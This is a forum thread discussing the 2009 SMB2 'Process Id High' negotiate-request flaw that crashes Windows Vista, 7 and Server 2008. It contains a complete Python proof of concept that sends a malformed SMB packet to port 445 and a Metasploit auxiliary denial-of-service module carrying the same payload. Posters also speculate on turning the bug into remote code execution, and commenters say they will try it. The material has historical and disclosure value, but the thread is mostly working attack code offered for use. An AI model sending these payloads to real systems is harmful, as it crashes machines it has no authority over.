» Windows Vista, 7 and 2008: SMB2 Remote Request PoC

[sniip3r]

An attacker can remotly crash any Vista/Windows 7 machine with SMB enable

BACKGROUND
-------------------------
Windows vista and newer Windows comes with a new SMB version named SMB2.
See: Windows Vista networking technologies - Wikipedia, the free encyclopedia
for more details.

DESCRIPTION
-------------------------
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB dialect that will be used for futher communication.

Code:

Smb-Bsod.py:

#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field 
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" 
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" 
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" 
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" 
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" 
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" 
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

PROOF OF CONCEPT

[MaXe]

Very nice sniip3r and even from the original source :-)

CyberMaN (from #intern0t irc) has tested this and it worked!

This is where I got it from:
Windows Vista / seven SMB Remote REQUEST zero day ? PenTestIT

I decoded the hex-code to make sure that it didn't contain any bad code:

Code:

����������ÿÿÿþ�����m�PC NETWORK PROGRAM 1.0�LANMAN1.0�Windows for Workgroups 3.1a�LM1.2X002�LANMAN2.1�NT LM 0.12�SMB 2.002�

http://home2.paulschou.net/tools/xlate/
http://pastie.org/609329

Here's a Metasploit port I made earlier today:
http://pastie.org/609407

Keep in mind that it might not work, due to I haven't tested it. However
I have sent this module to HD Moore in hope he will add it to the Metasploit
framework and perhaps correct some of my bugged syntax or check it out
further to see if it should be possible to escalate the issue.

Even though the only thing this PoC does it to send a & sign through a
remote request via the SMB (Server Message Block) service to a computer
that runs SMB Version 2.0 .. If the machine does it will crash with the following
error-code: PAGE_FAULT_IN_NONPAGED_AREA.

UPDATE:
The SMB header field that receives the & sign is named: "Process Id High".

Screenshot of Crash: (doesn't prove much though) http://m.blog.hu/bu/buhera/image/vista_smbv2.png

Articles about the vulnerability could be used for Remote Code Execution:
http://www.reversemode.com/index.php...d=64&Itemid=15
http://blog.48bits.com/?p=510 (TRANSLATED!)

After reading the reverse mode article which said that we have 16 bits available which we can control, I began thinking..
Since a normal address in an EIP is 4 bytes or 32bits, then we cannot use that but we should be able to use jmps (assembly)
instead! Those are usually only 16 bits (2 bytes) of what I can remember and if you wonder how insane that is, 2 bytes could be = "12" (or "ab").

Of course it isn't much to play with but I hope someone will be be able to escalate this issue, would be nice :-)
I might even as well take a look if I can borrow a Vista machine of a friend since I don't have any at home, only Linux xD

:END OF UPDATE

The reason why I have split up the shell-code is to make it easier to read.


2ND UPDATE:

In the code below: buf5 = "\x00\x26"
Is the ESI value we can control which are the 16 bits that One said could be used for RCE.

:END OF 2ND UPDATE

3RD UPDATE:
HD Moore has made 2 modules in Metasploit! (No RCE yet though).
http://trac.metasploit.com/browser/f...ate_pidhigh.rb
http://trac.metasploit.com/browser/f...otiate_stop.rb

The Metasploit module I made / ported was fixed by: THeReVeReND :-)
:END OF 3RD UPDATE

The code below has been fixed by: THeReVeReND

Code:

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Auxiliary

    include Msf::Exploit::Remote::Tcp
    include Msf::Auxiliary::Dos

    def initialize(info = {})
        super(update_info(info,    
            'Name'           => 'Windows SMB2.0 SRV2.sys 0-day DoS',
            'Description'    => %q{
                    This module exploits an "unknown" vulnerability in the SMB2.0 service on windows.
                    The vulnerability exists within the "Process ID High" which are 16bits we can control.
                    Ported by MaXe security@intern0t.net. Rewrite by THeReVeReND.
            },
            'Author'         => [ 'MaXe, THeReVeReND, credits to: Laurent Gaffié' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision$',
            'References'     =>
                [
                    [ 'URL', 'http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html' ],
                ],
            'DisclosureDate' => 'Sep 07 2009'
        ))
        
        register_options(
            [
                Opt::RPORT(445),
            ],
        self.class)
    end

    def run
        connect

        dos = "\x00\x00\x00\x90"+
        "\xff\x53\x4d\x42"+
        "\x72\x00\x00\x00"+
        "\x00\x18\x53\xc8"+
        "\x00\x26"+
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"+
        "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"+
        "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"+
        "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"+
        "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"+
        "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"+
        "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"+
        "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"+
        "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"+
        "\x30\x30\x32\x00"

        sock.put(dos)

        disconnect
    end

end

[macd3v]

this looks sweet nice post i must try :D

[MaXe]

Update!

As most people knows, Immunity Inc has made a working exploit!

Here is a video presentation of the exploit:
Immunity CANVAS SMBv2 Exploit (Vista/Server 2008)

HD Moore also tweeted:
“looks like immunity has a working remote for SMB2: Immunity CANVAS Early Updates (metasploit should be done in the next week)”

Woot! I look forward to see it and hopefully some comments on how it was done! xD


Reference:
[Dailydave] SMBv2 Remote Exploit Improvements
Twitter / HD Moore: looks like immunity has a ...

[N4ck0]

nice one brother

i must try this

[CyberDevin]

I feel good I actually understood some of this xD

[MaXe]

Hehe that's nice to hear CyberDevin :-)

SecurityFocus put up my "ported" version of it too heh:
http://downloads.securityfocus.com/v...its/36299-2.rb

Even though I also sent them a mail as soon as the Metasploit project had a better version implemented :-)

[CyberDevin]

Quote:

Originally Posted by MaXe

Hehe that's nice to hear CyberDevin :-)

SecurityFocus put up my "ported" version of it too heh:
http://downloads.securityfocus.com/v...its/36299-2.rb

Even though I also sent them a mail as soon as the Metasploit project had a better version implemented :-)

What lang is that? It doesn't look like C I don't think xD unless I'm just confused

[MaXe]

It's Ruby since Metasploit is written in Ruby and it is also the largest project ever made, in Ruby :-)